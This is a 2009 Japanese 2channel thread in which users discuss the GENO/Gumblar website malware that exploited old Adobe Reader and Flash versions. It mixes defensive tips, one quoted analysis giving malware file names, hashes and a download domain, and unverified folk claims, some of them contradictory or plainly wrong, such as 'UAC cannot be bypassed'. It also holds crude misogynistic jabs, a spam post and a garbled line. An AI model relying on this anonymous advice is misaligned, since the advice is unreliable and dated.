ユリオプスデージー(北海道) :2009/05/17(日) 21:50:43.83 ID:pcT6KiTg
何でこんなに盛り下がってんだよ
>>379 ありがとうございます。
無事だったんで一安心
386 :
プリムラ・ヒルスタ(埼玉県) :2009/05/17(日) 21:52:44.84 ID:W7zECwLz
>>375 今までのウイルスもそんなもんだろ
適当に同人サイト見てみたら今回のウイルスについて間違った知識てんこ盛りで
えらそうに対策打ってた奴もいてワロタ
女はネットやるな
エロ収集はP2Pでするか
389 :
藤(神奈川県) :2009/05/17(日) 21:53:18.05 ID:j/TqFG/D
>>383 ウイルス作者が低スキルみたいだからなあ。
くだらんわ。
391 :
ロウバイ(岩手県) :2009/05/17(日) 21:54:50.81 ID:HsmjOfzR
Adobe Acrobat ReaderとAdobe Flash Playerを 最新にしたらある程度のリスクは回避でOKなのか?
しゃあないとりあえずPCはパンドラとコソアンだけにしとくか
394 :
ローダンゼ(福岡県) :2009/05/17(日) 21:58:04.89 ID:+5MOTdjQ
395 :
タチツボスミレ(静岡県) :2009/05/17(日) 21:59:11.06 ID:OUWbXyvU
うかつにオナニーも出来ないね
今回のウイルスはAdobeの脆弱性を狙ったものだから Flash PlayerとReaderを公開された修正版にアップデートすれば話は終わるんだが それすらわからない人達がいっぱいいるから盛り上がっているわけです
397 :
ロウバイ(福岡県) :2009/05/17(日) 22:00:03.16 ID:IgdWAzg2
flash最新版にしてるのに youtube他サイトでflash最新版を求められる なぜ?!
398 :
プリムラ・ビオラケア(福島県) :2009/05/17(日) 22:00:28.33 ID:s5ZNU51Z
399 :
キブシ(東京都) :2009/05/17(日) 22:01:10.53 ID:lkGVu3aj
>>363 コンテンツ > プラグインを有効にする のチェックをはずす
401 :
シロイヌナズナ(アラビア) :2009/05/17(日) 22:02:07.30 ID:nMIkKb4Z
私はいくつか日本の友達を探したくて、日本語を学んで、私もあ
なた達の中国語を教えることができて、みんなが私と友達をすることができることを望んで、私は今中学生です
付き合う中国のBlogger:monkey.d.lin.blog.163.com
QQ:395458789日
本のBlogger:
http://blog.livedoor.jp/lyz395458789 【Blogge
rが今日ちょうどいじったのです、その上私が日本語が見て分かりません、だから少し単調です】
なんかもっと未曾有の恐怖が蔓延すると思ったけど、 そんな感じじゃないな。
>394 GENOウイルスチェッカー 危険度2% 安全なURLです。踏んでも大丈夫でしょう。
>>396 へーなるへそー
まぁ警戒に越した事は無いが心の荷が軽くなったぜ
そしたらそれ以外の弱点を突いて来るウイルスが
出て来るかもなんですね…(そうなったらもはや新種だが
405 :
プリムラ・ビオラケア(関西地方) :2009/05/17(日) 22:04:15.00 ID:CGz5lqbx
vista厨って ロクな知識もない低知能がノコノコとPC買いに行って店員の言いなりになってムザムザとvistaインスコモデルを買わされたんでしょ? 良かったね、溜飲を下げることができて。おめでとう。君たちの選択は正しかったと思うよ。うん。wwwwwwwww
406 :
桜(大阪府) :2009/05/17(日) 22:04:33.10 ID:FUxhLkqA
もっとこう、社会がめちゃめちゃになるようなウイルス作れんのかね 頭悪いんだな
>>396 ああそれとありがとう
さて周りの人間に対策方法などを伝えたりするか…
411 :
カンパニュラ・アーチェリー(埼玉県) :2009/05/17(日) 22:07:42.01 ID:k6FYHCKo
412 :
コメツブツメクサ(愛知県) :2009/05/17(日) 22:07:43.55 ID:H5zMec2W
GENOウイルスチェッカー 危険度1000% 超絶危険なURLです。友人のPCを壊すのに利用しましょう! 絶対に踏んではいけません。 評価ミス報告
同人板は腐女子が未曾有の恐怖に叩き込まれているな。
415 :
ビオラ(東京都) :2009/05/17(日) 22:14:53.26 ID:J0yUII5Y
同人板普段行かないけどあのスレは結構親切だな
416 :
サイネリア(関東・甲信越) :2009/05/17(日) 22:14:57.44 ID:NrIozNFe
フラッシュプレイヤーは10 0 22 87 アドビも最新版にした noscriptもadblockも入れた UACも有効 これで大丈夫な筈だよね
改竄されたページのスクショとかってないの? GENOとかどんなんなってたのか見てみたい
この手の騒ぎがくるといろいろ調べるから知識が増えてちょっと嬉しい。
419 :
ダンコウバイ(青森県) :2009/05/17(日) 22:18:39.75 ID:mmnPIZEh
あるサイト危険度50%で安全って言われたけど、大丈夫なのか?w
420 :
ねこやなぎ(埼玉県) :2009/05/17(日) 22:18:50.14 ID:OE/Nzau1
421 :
ねこやなぎ(千葉県) :2009/05/17(日) 22:19:05.93 ID:/hTo2UfK
>>416 そこまで対策したからと言って[大丈夫]の一言で片付けるのは危ないよ
>>418 /⌒ヽ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
∧,,∧^ω^) < このスレ定期的に立つNE!
/・ ・`ヽと ) \_____________
(。。ノ しヽ
/ヽ / ノ
( へ /|.|
ヽヽ| | U
| | パカパカ
U
423 :
ナニワズ(catv?) :2009/05/17(日) 22:20:45.38 ID:FjzzEBIm
レジもコマンドも開けた とりあえず安心
さっきseibidoshuppan踏んじまったけどなぜか大丈夫だった
感染したらどうなんの?
426 :
キブシ(長屋) :2009/05/17(日) 22:22:23.52 ID:hgvJMr2D
>>415 つかν速民は他の板に行かないほうがいい。
メシウマとか情弱とか語って煽ってるマジキチ=ν速民ってのが他の板では常識なんだよw
429 :
ナニワズ(catv?) :2009/05/17(日) 22:23:05.73 ID:FjzzEBIm
firefoxにしててよかった
>>423 最近の亜種は、レジもコマンドも開けられるようだよ。
432 :
アルストロメリア(神奈川県) :2009/05/17(日) 22:25:00.03 ID:I8b7rFs7
433 :
サンシュ(東京都) :2009/05/17(日) 22:26:14.47 ID:TVbfxF0n
プニルだったから大丈夫だったのかな
再起動したけど問題なし
>>362 これも問題なし
OS、antivirとflash更新してきた readerは元から使ってないsumatraでおk これで当分様子見
>>431 レジストリエディタが開けるんだったら、直すのもそんなに難しくないわけだがw
437 :
ナノハナ(アラバマ州) :2009/05/17(日) 22:29:40.20 ID:SPGYBJAI
438 :
センダイハギ(アラバマ州) :2009/05/17(日) 22:31:35.94 ID:OyHCHJOU
Adobe Reader の最新版って9.1.1なんだろ? ふつうにサイト行っただけじゃ9.1しかないじゃん わかりにくすぎだろ
>>438 helpのupdateの有無みたいなとっからできるよ
440 :
デルフィニム(愛知県) :2009/05/17(日) 22:33:46.11 ID:yIUHgeE2
>>365 個人サイト持ちが多い腐女子にとっては驚異的なウイルスであると容易に想像できる。
441 :
バーベナ(群馬県) :2009/05/17(日) 22:34:10.00 ID:/94U3SfW
XPSP2なんだがSP3にしたほうがいいのか教えろクズども
>>436 そういわれても、確かめようがなくて困っているのですよ。
926 名前:GENO[] 投稿日:2009/05/17(日) 21:50:07 ID:1XXBwaecO (携帯)
最近の亜種だとcmdもregeditも普通に出来るみたいってのはマジ?
963 名前:GENO[sage] 投稿日:2009/05/17(日) 22:02:55 ID:uEd/QI2I0 (PC)
>>926 自分じゃないが、知人は、プロンプトもレジストリエディタも開いたけど、
sql〜は1300kbぐらいのヤバイサイズだったらしいから、そうかもしれん。
443 :
ねこやなぎ(埼玉県) :2009/05/17(日) 22:35:04.11 ID:OE/Nzau1
>>441 え、ν即民はSP1だろ・・・?
俺釣られちゃったかな?
>>438 Adobe Readerを起動→ヘルプ→製品向上でいい筈
445 :
センダイハギ(アラバマ州) :2009/05/17(日) 22:35:14.93 ID:OyHCHJOU
>>439 重大なことなんだから、もっと前面に注意書き出しとくべきだと思うんだがな
446 :
トベラ(東京都) :2009/05/17(日) 22:36:44.21 ID:Ugp/UXZi
adobeむかつくな相変わらず。。
448 :
サポナリア(アラバマ州) :2009/05/17(日) 22:38:44.56 ID:/aQAF9uz
未だにドリームキャストでネットしている俺は勝ち組だな。 ウイルス?何それ?www
449 :
ポピー(コネチカット州) :2009/05/17(日) 22:39:02.36 ID:VuAFQuDp
こんな騒ぎになってる割には某巨大インタネット掲示板は感染してないんだね
愛の妖精ぷりんてぃんが感染しとるぞww
451 :
オンシジューム(埼玉県) :2009/05/17(日) 22:39:55.49 ID:EBu8oFSG
>>450 あのおばちゃんじゃあ治せないんじゃねえかなw
452 :
プリムラ・ビオラケア(関西地方) :2009/05/17(日) 22:40:18.64 ID:CGz5lqbx
感染してる同人サイトって、腐女子サイトがほとんどじゃねーの?
453 :
ヤエヤマブキ(アラバマ州) :2009/05/17(日) 22:40:25.17 ID:pinSpSMk
しかも21.8Mもある
愛生会病院も感染してるな
みんな感染サイトの主に感染のこと報告してる?
>>441 XP home SP3だけどGENO踏んでも大丈夫だった
最新版にアップグレードできないMeと98は座してゲノ待つしか無いのですか そうなのですか フラッシュ見ないとかpdf開かないとかそんなんじゃ駄目なんだよな 思いきって消すしかないかフラッシュプレイヤーとアクロバットリーダー しかしカタカナで書くとより情弱が強調されるNE
401 192.168.0.774 [sage] 2009/05/17(日) 22:38:51 ID:N9SKEU4J0
え〜、gnomeの人のおかげで挙動の予想がついてきたので、ちょっとexeの方を実行した時に
作成されるファイルを仮想PCで確保してみました。
ベンダーに提出するかどうかの判断は各自にお任せします。(一応、KasperskyとAVIRAには送ってあります。)
muvl.exe (元の名前 muvl.nug) - ランダム作成らしい。
MD5 : 3862b349b9b5c9283925e181ff9f5bf8
http://www.virustotal.com/jp/analisis/6ee378acae1dfede9be4c3949ee56b1a (2/40)
sqlsodbc.chm - ただのダミーファイルです。(中身は無意味なテキストと空白)
MD5 : 34cd61d83853e511f0a28027f639a1c9
http://www.virustotal.com/jp/analisis/395c9f2d6d6d38525fb24b3722664bfa (0/40)
muvl.exeは、中身に合わせて拡張子を変えてあります。(ベンダー提出時に捨てられないように)
gnomeの人の所の話では、一定時間毎に自己書き換えをして潜伏するそうなので、シグネチャで
対応できる可能性はかなり低そうですが、出さないよりはマシかもしれません。
sqlsodbc.chmの方はダミーファイルなので、マルウェアではありません。
感染すると、sqlsodbc.chmがこれに置き換えられるという意味で参考に添付してあります。
ファイルサイズは1,323バイトで、オリジナルファイルと置き換えられます。
あと、悪い話ですが、SymantecでもKasperskyでも、オンラインスキャンではコイツに感染していることがわかりません。
バッチリ感染した仮想PCをオンラインスキャンしてみたのですが、どちらも何も検出しませんでした。
このマルウェアは、感染時に元の実行ファイル(martuz.cnから落ちてくるxxxx.exe)の方を消去(証拠隠滅)
するようになっているので、一度感染すると、本体の自己書き換えもあるので、検出はほぼ不可能と思われます。
タチ悪すぎ...
GENO踏みまくったけど、いまんところ大丈夫な俺 火狐使用だったのが幸いしていたのか
461 :
カンパニュラ・ベリディフォーリア(沖縄県) :2009/05/17(日) 22:45:15.08 ID:Kdnjyc4h
>>458 ウィルスの方も面倒くさくて対応してない可能性がある
このウイルス作った奴すごいな
>>459 感情がある人間が造ったと思えない!
鬼!悪魔!鬼畜ーーー!!
466 :
センダイハギ(アラバマ州) :2009/05/17(日) 22:49:29.22 ID:OyHCHJOU
>>458 Meと98なんてもともと個人情報入れてネットに繋がないだろ
GENOじゃなくても情報除かれ放題じゃないの?
>>459 こりゃゲートになってるAdobeをなんとかするのが一番手堅いかもわからんねw
もうされてるんだけど。
仮に別の脆弱性を付いてくるようになったら手がつけられんぞw
468 :
ハクモクレン(静岡県) :2009/05/17(日) 22:50:16.92 ID:7oZmhocx
自己書き換えしてセキュリティーソフトのパターンマッチング回避しているのか。 タチワルだな。
470 :
センダイハギ(アラバマ州) :2009/05/17(日) 22:53:58.33 ID:OyHCHJOU
Adobe最新にして、firefoxにでもすりゃとりあえずはいいのか? こえーよ
いや、NT5系が集団感染しているのを見ているとメシウマとさえ思えてくる。 我が家のPC7台中5台がXPなんだけどね。残り2台がVista。
同人板のやつら必死すぎだろw 感染サイトのアド書き込んだだけで逮捕だとよwwww
>>446 たぶん、ウィルス作ったやつもむかついてたんだろうw
475 :
サイネリア(関東・甲信越) :2009/05/17(日) 22:56:20.72 ID:NrIozNFe
このウィルス作った奴は忍者だろ
476 :
ダイセノダマキ(大阪府) :2009/05/17(日) 22:57:00.73 ID:3Z/DBOwd
477 :
スズナ(福井県) :2009/05/17(日) 22:57:21.01 ID:aThEtNN3
とりあえずメインPCがVistaだからUACオンにしたわ UAC入れると他PCとのファイル共有がめんどいんだよなあ あーあ
478 :
桜(大阪府) :2009/05/17(日) 22:58:02.16 ID:FUxhLkqA
Sumatra PDFの俺には関係ないぜ!
自己書き換えのパターンが周期的ならマダ対応の仕方もあるだろうけどそこらへんどうなんだろ
>>461 いやそんなadobeの脆弱性にOSの新旧は
VistaがとにかくUAC(だっけ)でガードされてるってだけではないのか
アクロバットリーダーなんか5だった、もう泣くしか無い
当然ヘルプ開いてもアップデートへのリンクなんか無いっていう
>>466 そんなもんなのか。じゃあ今更騒いでも仕方ないのかな。でも
クレカとかネットバンクとか使ってないから覗かれても住所氏名位なのは
変わらないとしても、サイト持ってるから改竄されるのが今回は恐ろしい
FTPじゃなくてファイルマネージャ使ったら大丈夫なんだろうか
482 :
タニウズキ(神奈川県) :2009/05/17(日) 23:04:56.72 ID:RddtXoK4
UACより、そもそも管理者権限で使うなよ 管理者権限はアプリのインストールとかシステムいじるときだけにして、 普段は一般ユーザーで使え
483 :
サンシュ(東京都) :2009/05/17(日) 23:04:59.31 ID:TVbfxF0n
自己書き換えで姿が変わるんならGENO(ギニュー)ウィルスと名づけよう
484 :
藤(東京都) :2009/05/17(日) 23:05:37.37 ID:Se289yeX
今回の件とは関係無いけど 同人板って、板自体が慢性的にウィルスか何かの被害にあってるみたいな 書き込みをよく見掛けるんだけど、 あれって本当なんかな。 本当なら運営が放置してるってのがよく分からん
485 :
スズナ(福井県) :2009/05/17(日) 23:05:48.30 ID:aThEtNN3
>>480 ノートン製品には意地でも頼らないジャスティス
486 :
オウギカズラ(大阪府) :2009/05/17(日) 23:05:48.15 ID:b2j55ziw
なぜvista付属のUACがそこまで忌み嫌われるのか
>>482 同意 そこにパスつきしたら最強
488 :
タチツボスミレ(静岡県) :2009/05/17(日) 23:07:23.32 ID:OUWbXyvU
やばい ヴぃすた欲しくなってきた
>>486 あんなものを有難がっている方がおかしいはwww
まぁ「踏んだけどなんともならなかった」と言うXP厨には あとできっついお仕置きな請求書とか届いたりすんですかねぇw?
>>482 いまの環境をそのまま使う場合、
まず管理者アカウントをもう一つ作って、それから、現在の管理者アカウントを一般に落とせばいいの?
492 :
ヒナゲシ(大阪府) :2009/05/17(日) 23:08:55.79 ID:hCg8v3lR
これってXP厨ならpdfとswfの関連付けを外しておくだけでいいんじゃないの?
VistaのUACはウザイけど、やはり守りは堅かった
494 :
タニウズキ(神奈川県) :2009/05/17(日) 23:09:40.32 ID:RddtXoK4
>>425 汗水流し働いてゲットした金が奪われる可能性UP
PCブルースクリーンで起動不可
竹島にテレポート
金正男が北朝鮮の後継者になる
UACがあるから感染しないわけじゃねえだろww 情弱乙
UACは鬱陶しいけどちゃんと警告すべきものを警告してくれてるからそんな悪い機能じゃない
現在のセキュリティーソフトはぶっちゃけて言えば特定されたウイルスの型を 照合してする方法だから、 一定時間ごとに型が変わる奴を検出するのは難しいよな。 殆どの奴が無力化されている状態だろ。
いろいろ踏んできたけどXP&IE8じゃなんともないな
500 :
オウギカズラ(大阪府) :2009/05/17(日) 23:11:12.58 ID:b2j55ziw
>>489 なんで?MacやLinuxだってUACあるだろ
あれが標準になるんだけど
うっとおしくもないし
501 :
スズナ(関西地方) :2009/05/17(日) 23:11:20.90 ID:w3dprot+
???????? ??? ??????? ?? ????? ????????? ??????? ?? ???? ??? ????? ????????? ???? ????????? ??? ??????? ?????? ?? ??????? ? ??? ?????? ????? ???? ?????? ??? ???? ????????? ??????. ??????? ????? ?????? ????? ???? ? ???? ?????? ?????????.
503 :
マツバウンラン(岡山県) :2009/05/17(日) 23:12:45.11 ID:kRX/rFYX
chromeは砂箱で安全なんでしょ?
Vista厨が必死なスレになってる
水際で防ぐしかないってどんだけインフルなんだよ。
506 :
チドリソウ(関東) :2009/05/17(日) 23:13:46.40 ID:t0SzZMWL
adobe重い…更新出来ね…イライラ
508 :
マツバウンラン(三重県) :2009/05/17(日) 23:14:27.12 ID:SEg/+KwM
ネットの情報を鵜呑みにしないで素直にVista買ってよかった 定員さんありがとう
509 :
ビオラ(関西) :2009/05/17(日) 23:14:28.39 ID:mILEUvOQ
火狐でも無理なのか?
もうAdobeのうちインスコされてるものを最新版にしてあとはへんなもの踏まないことを祈るしかないな ていうかどこのベンダもまだ対応してないわけ? むしろ気づいてなかったり?
511 :
サイネリア(関東・甲信越) :2009/05/17(日) 23:15:20.89 ID:NrIozNFe
今一番必死なのはvistaを道連れに出来なかったXP厨だと思うがw
512 :
バーベナ(群馬県) :2009/05/17(日) 23:15:39.38 ID:/94U3SfW
513 :
オウギカズラ(大阪府) :2009/05/17(日) 23:16:09.40 ID:b2j55ziw
成美堂って英語の構文150のとこか
つかVistaなんて入れてる物好き厨は普通にXP何台か持ってるから
>>459 だれかこれ噛み砕いて説明してくれませんか
>>515 ウイルス駆除ソフトはウイルスの型をデータと照合して消すけど
こいつはその型をめまぐるしく変えて尻尾をつかませないってこと
>>485 フリーツールだよ。試作段階の。
便利なツールは使わなきゃ損。
なんともはや
まるでHIVだな たちが悪い
520 :
チチコグサ(関東) :2009/05/17(日) 23:19:44.55 ID:txLouzWF
>>459 つまりsqlsodbc.chmが改変されてきゃ大丈夫なんだな?
VistaはセキュアOS セキュアOS(Secure OS)とは、セキュリティを強化したオペレーティングシステムのことである。 厳密な定義は存在していないが、強制アクセス制御(Mandatory Access Control:MAC)機能及び、 最小特権を実現する機能を備えたものをそう呼ぶことが一般的である。 UACは、強制アクセス制御でかつ、最小特権を実現する これを嫌がってるのは情弱のそしりを免れない ちなみにユーザーアカウントでも、必要なときにはUACで管理者モードに昇格できるので、 普段はユーザーアカウントで使用するのが正しい使い方 しかし普段から管理者アカウントで使っても、UACが強制アクセス制御と最小特権を実現する不思議 これはUNIXやLinux以上の高機能である
ここまで手の込んだウィルス作る意図って…
犯人捕まってもIT各社から高待遇で迎えられるんだろーな マフィアのPCぶっ壊して私刑にあえばいいのに
524 :
ハルジオン(dion軍) :2009/05/17(日) 23:22:56.44 ID:WSFAe35y
公明党ブラウザは大丈夫ですか
>>459 sqlsodbc.chm - ただのダミーファイルです。(中身は無意味なテキストと空白)
sqlsodbc.chmの方はダミーファイルなので、マルウェアではありません。
感染すると、sqlsodbc.chmがこれに置き換えられるという意味で参考に添付してあります。
ファイルサイズは1,323バイトで、オリジナルファイルと置き換えられます。
ってことは、ダミーファイルのsqlsodbc.chmが、正規のオリジナルファイルと同じファイルサイズにされたら、
>>472 のファイルサイズ確認は使えないのね?
527 :
シナミズキ(兵庫県) :2009/05/17(日) 23:25:55.46 ID:Qi4XGox+
>>520 VistaならWindows\Help\mui\その下に0409、0411の2つのフォルダがあるけど、
要はデータソースウィザードのヘルプファイル。正常にオープンできればOKと認識している。
529 :
サンシュ(東京都) :2009/05/17(日) 23:28:16.52 ID:TVbfxF0n
>>515 ボディーチェーンジ!の使いすぎで本来の姿を忘れてしまった
530 :
オウギカズラ(大阪府) :2009/05/17(日) 23:28:19.17 ID:b2j55ziw
f639afde02547603a3d3930ee4bf8c12 上が正規ファイルのハッシュ これがあってれば大丈夫
531 :
バラ(catv?) :2009/05/17(日) 23:28:51.14 ID:MPEMpk02
532 :
マツバウンラン(岡山県) :2009/05/17(日) 23:28:58.62 ID:kRX/rFYX
>>526 ダミーファイルって良く解らないけど
今はたまたまsqlsodbc.chmだけど
他のファイルに変更されたらそれだけ監視しててもダメだよな
ウィルスの挙動に関係ないならそのファイル書き換える必要ないような気がするけど
これはどういうこった
なんだかエライこと起きてたんだな 情弱でアホな俺にはこういう会話は尊敬する wikiで見たら一応感染してないみたいだから後は祈るしかない とりあえず怪しいところは見なきゃいいんですよね 先生
そもそもsqlsodbc.chmを書きかたら意図は何なのか
535 :
ユリオプスデージー(北海道) :2009/05/17(日) 23:30:33.42 ID:pcT6KiTg
おいお前ら正直に答えてくれ 飽きてきただろ
sqlsodbc.chm のファイルサイズ49.5KBってなってるけど大丈夫だよね?
537 :
マツバウンラン(岡山県) :2009/05/17(日) 23:31:14.63 ID:kRX/rFYX
433 名前:401[sage] 投稿日:2009/05/17(日) 23:26:41 ID:N9SKEU4J0
>>416 嫌なことに、特に異変がない。 cmd.exeも普通に実行できるし、レジストリエディタも問題なく実行できる。
少なくとも、現在配布されているバージョンのウイルスについては、cmd.exe,レジストリエディタによる確認は不可能。
確認は、sqlsodbc.exeだけが頼りですね。
あと、動作が重くなったり、おかしくなった感じも特にない。仮想PCで重さの変化を感じないのだから、
実機ならまず気が付かんでしょう。
これ、今出回っているヤツだと、確実に感染したことに気がつかんと思う。 同人板その他、パンデミック状態になったの理解できるわ。
2chに引きこもって対応待ち
マジレスほしかったが今んとこ問題ないし寝るか…
>>536 ダブルクリックして開ければOKだと思う。ウィルスの踏み台にされた後には意味ないものになってるはずだから。
潜伏期間ってないの?
時限式とか恐い想定するなよ・・・
>>539 感染しているかどうかどうやってチェックした?
今はやっているウイルスはcmdもレジも開けるだよ。
sqlsodbc.chmの変化しか感染したかどうか分からない。
>>532 sqlsodbc.chmという明確な診断方法を予め周知させておいて、
ある日sqlsodbc.chmへの書き換えを行わない亜種を流して混乱させる…とか
とは言っても、sqlsodbc.chmが変わらない例は既にあるんだよな
545 :
ジュウニヒトエ(アラバマ州) :2009/05/17(日) 23:34:46.01 ID:pHEo3uw6
亜種にしろなんにしろアドビの脆弱性狙ったものなら アップグレードするなりアンインスコしとけば平気ですか?
>>536 sqlsodbc.chmのCRC32、MD5、SHA1を比べてみる
感染確認と各アップデートを済まして 後は危険IPのブロックとやらをするだけなんだが BBR-4HGのIPフィルタルールの設定方がよく分からんのでパス。。 まあ、情弱の俺でも最低限の事はやったから 騒動が収束するまでは外出は控え専ブラで2chに引きこもるか。
548 :
スズナ(東京都) :2009/05/17(日) 23:36:06.42 ID:yo6/k/EH
>>543 俺が感染した奴はsqlsodbc.chmも変わらなかった
549 :
マツバウンラン(岡山県) :2009/05/17(日) 23:36:59.44 ID:kRX/rFYX
>>537 の訂正
435 名前:401[sage] 投稿日:2009/05/17(日) 23:28:50 ID:N9SKEU4J0
>>433 >確認は、sqlsodbc.exeだけが頼りですね。
exeじゃねえ... sqlsodbc.chm ですな。
ちょっとまてよ、FLASHを最新にするって事はPLAYER10かよ、9じゃなくて。 これはFLASH10の普及が遅れてるADBEOの陰謀だな
551 :
オキザリス(東京都) :2009/05/17(日) 23:37:31.07 ID:OT2LLMTM
>>515 簡単に言うと、大抵のウイルス対策ソフトだと
パターンファイルを頻繁に更新しないと発見できないから困ったね
ということだ。
552 :
オキザリス(東京都) :2009/05/17(日) 23:38:32.77 ID:OT2LLMTM
>>522 この結果をベースに、もっと発見されづらいトロイを
仕込んでボッとネットワークの作成って事じゃないかな。
とりあえず思いっきり感染してるんだが 専ブラのdatとかもアウトになってるものなのか? バックアップ取ってねえよぉ
554 :
オウギカズラ(大阪府) :2009/05/17(日) 23:38:40.47 ID:b2j55ziw
>>536 右クリプロパティやってみたら解決するよ
555 :
シロバナタンポポ(東京都) :2009/05/17(日) 23:39:16.89 ID:ARglw2xD
てか、いまだにFTPでサーバにアクセスしてるヤツ自体の存在がダメじゃないの? SFTPとかSSH使えよ。
556 :
イカリソウ(大阪府) :2009/05/17(日) 23:39:37.76 ID:q6KyqPC+
ていうかなんで無意味にファイルを書き換えるんだろうな そのファイルに自己書き換えのキーがおかれてるとかじゃないの?
四月末にSalityで散々酷い目に遭った次はこれか・・・ 恐ろしくてマトモにネットできんなw
adobe readerをアンインストールする手はあり?
コンパイル済み HTML ヘルプ ファイル 49.5 KB (50,727 バイト) 44.0 KB (45,056 バイト)
563 :
バラ(秋田県) :2009/05/17(日) 23:41:58.55 ID:SNHGg7cv
なんかMSの陰謀の気がしてきた
この騒動はXP切り捨てるための陰謀だったんだよ!
566 :
ヤブツバキ(広島県) :2009/05/17(日) 23:42:26.59 ID:MYa7iwNj
2ちゃんとニコニコが見れれば感染してもいいじゃん
567 :
オキザリス(東京都) :2009/05/17(日) 23:42:47.91 ID:OT2LLMTM
>>555 SFTPは普通に使うなら良いんだけど、1サーバに200ユーザとか入れてる
ホスティングサービスとかだと、数十人が同時に使うとCPUへの負荷が
結構な物になるので、未だにFTPしか用意していないサーバって結構あるんだよ。
個人や趣味ならまだしも、企業とかでそういうサーバを使っているってのは
問題だとは思うんだが。
568 :
ギシギシ :2009/05/17(日) 23:42:53.58 ID:cg2kd3v7
>>559 Avastすり抜けてくる奴もいるってさ…
f639afde02547603a3d3930ee4bf8c12だった
570 :
ケンタウレア・モンタナ(関東) :2009/05/17(日) 23:43:58.42 ID:PFoIP620 BE:1557589695-2BP(7670)
怖くてオナネタすら探せない
571 :
ペラルゴニウム(アラバマ州) :2009/05/17(日) 23:44:04.75 ID:JqrHXXra
例外はあるが、大雑把にまとめると XPを使用 ↓ IE6か7を使用 ↓ AdobeFlashPlayer、AdobePdfReaderのverが古い これが確実に感染するPC それ以外でも感染しないとは言えないけどね、ってのが現状 亜種祭りにならなければ(もうなってるかw)、ニュー速民には脅威ではない
572 :
ヒマラヤユキノシタ(山陰地方) :2009/05/17(日) 23:44:10.83 ID:72kAzcv0
このスレ見てたらどのサイトも怖くて見れないでござる
574 :
モリシマアカシア(アラバマ州) :2009/05/17(日) 23:45:18.03 ID:78Ssa5kx
エロサイトでネタ漁るの自重しよう
情弱ですまんが、
>>459 のファイルサイズとばっちり一致しちまったんだけど、クリーンインストールすればもうそれでいいんだよな!?
ちなみに家のXPはネットの接続がとにかく悪くてアップデートさえしてもらえない・・・インストールもウイルススキャンもできない始末
576 :
オウギカズラ(大阪府) :2009/05/17(日) 23:47:22.37 ID:b2j55ziw
UACで動作防げるマルウェアなんていくらでもあるし陰謀とかあり得んだろw
>>568 アバストは8割ぐらい検出とか書いてたな
赤傘はまだかな
>>569 おめでとう
FlashPlayerてんこ盛りのサイトは氏ねってことだね。 まぁそれはともかくバージョンアップをなんてまともにやっていない端末が 多いだろうからどう考えてもオワタだろ。ましてやOSのサービスパックすら 満足に当ててない端末とかも普通にあるだろうしな。
580 :
ギシギシ :2009/05/17(日) 23:48:21.86 ID:cg2kd3v7
>>572 うちもAvastが今日1回ブロックしてるし。怖くてWEB見れねぇよ。。
>>575 2行目も症状なんじゃね?さっさと再インスコしる
まとめサイト消えてない?
582 :
シロバナタンポポ(東京都) :2009/05/17(日) 23:49:17.34 ID:ARglw2xD
>
>>579 まぁそんなPCはGENOウィルスに関わらず古典的なウィルスに感染しまくってるよね
>>577 亜種だと発見できない可能性がある。クリーンインスコ推奨かも…。( ´・ω・)
企業のPCとかもいっぱい感染してそうだ…
Windows vista C:\WINDOWS\Help\mui\0411\sqlsodbc.chm のサイズが50,727 bytesなら安全 亜種だと無駄みたいだが
586 :
サンシュ(東京都) :2009/05/17(日) 23:50:13.59 ID:TVbfxF0n
ウィルス作った奴の就職活動手伝わされただけなんじゃね? 感染しても他のファイルには特段異常無し(クリーンインストールしなければならないとはいえ) 「実害が無い(?)が厄介なウィルス作りました、てへ」みたいな
XPもWindowsUpdateでUACを導入してくれないの?
>>579 SPはむやみやたらに導入すると逆に駄目だと聞いたことがあるけど?
うっかりクリック防止用にも疑わしいアドレスはhだけじゃなく ttpまで削って欲しい
avastでとりあえず第一次防疫 adobe readerを入れないこと・flashを最新版にすることで第二次防疫 ルータで94.247.2.195とのパケット送受信を拒否で第三次防疫 できるならユーザ権限を管理者から一般に移して最終防疫 IE8・operaとかは予備 って感じか とりあえず最後の権限だけどうするかだな・・・ インスコのたびにユーザ切り替えはなぁ・・・
592 :
ギシギシ :2009/05/17(日) 23:51:06.72 ID:cg2kd3v7
>>584 >571の環境で即思いついたのが、お前らの嫌いなあそこの本社なんだが。
珍しく赤字って報道されてた、あそこ。
594 :
オキザリス(東京都) :2009/05/17(日) 23:51:14.42 ID:OT2LLMTM
>>584 流行ったのが週末だったのは、まだ救いがあるかも。
平日だったらもっと感染サイトが広がっているだろう。
595 :
ペラルゴニウム(アラバマ州) :2009/05/17(日) 23:51:21.97 ID:JqrHXXra
>>584 個人はPdfなんか無くても良いけど、企業は必須だからなw
個人向けPCに、アドベなんかをプレインスコしてたのが悪いと思うぞ
Vistaだから大丈夫とか言う奴もいるみたいだけど、 すり抜けする亜種が出てくる可能性が高いぞ。
月曜日からCO..JPとか.JPとかの企業ドメインが危ないな どっか大きな会社がやられてニュースになってやっと周知かな
Acroreaderは軽いからってずっと7.0にしてたのに 釣られて9にしてみちゃいました
ver7.0でアップデートめんどいから、とりあえずアンインスコした。
>>596 まじか、怖いな
ビスタの俺も安心するのはまだ早かったか
こんだけ2chでは騒がれてるのに、普通のニュースでは全然取り上げもされないよな PC詳しくない一般人や情弱とかどうするんだよこれ
605 :
クヌギ(東京都) :2009/05/17(日) 23:53:21.32 ID:8jn3+NEA
/) ///) /,.=゙''"/ / i f ,.r='"-‐'つ____ キャッシュ消せばいいんだよ! / / _,.-‐'~/⌒ ⌒\ / ,i ,二ニ⊃( ●). (●)\ / ノ il゙フ::::::⌒(__人__)⌒::::: \ ,イ「ト、 ,!,!| |r┬-| | / iトヾヽ_/ィ"\ `ー'´ /
>>596 昨日vistaでも感染確認とかあったけどデマだったんだ
607 :
ジュウニヒトエ(アラバマ州) :2009/05/17(日) 23:53:54.59 ID:pHEo3uw6
>>604 企業側としちゃ自社HPが攻撃サイトになってるなんて眼を背けたい事実だしな
609 :
ギシギシ :2009/05/17(日) 23:54:05.24 ID:cg2kd3v7
>>599 …ソコとも関係深いところ。んで日テレに近いとこ。
これで分かるな?w
マカフィー早く対応してやんなよ死んじゃうぞ。
611 :
藤(東京都) :2009/05/17(日) 23:54:17.02 ID:Se289yeX
まとめサイト繋がらないんだが・・
614 :
シュロ(神奈川県) :2009/05/17(日) 23:55:13.46 ID:zOaT0o6T
UACはすり抜けは無理 すり抜けたらMSが黙ってないから
